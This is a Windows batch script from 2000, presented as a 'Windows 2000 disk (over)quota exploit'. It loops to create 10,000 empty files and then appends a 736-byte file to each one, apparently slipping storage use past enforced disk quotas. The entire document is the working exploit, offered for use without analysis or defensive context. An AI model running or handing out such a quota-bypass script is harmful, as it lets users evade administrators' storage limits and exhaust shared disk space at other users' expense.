@echo off echo Windows 2000 disk (over)quota exploit echo Dave Tarbatt 26/02/2000 http://redirect.to/null/ rem rem Create 10,000 zero byte files ('REM>filename' used to work but not any more) echo Creating 10,000 zero byte files... for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do shift>FILE%%i%%j%%k%%l rem rem Create a 736 byte file (the largest extent that works) echo Creating 736 byte file... shift>736.txt for %%i in (0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22) do for %%j in (0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15) do echo.>>736.txt rem rem Appending the 736 byte file to all the empty ones (extend them) echo Appending 736 bytes to all 10,000 files... for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do type 736.txt>>FILE%%i%%j%%k%%l rem echo. echo Done. Massively over quota!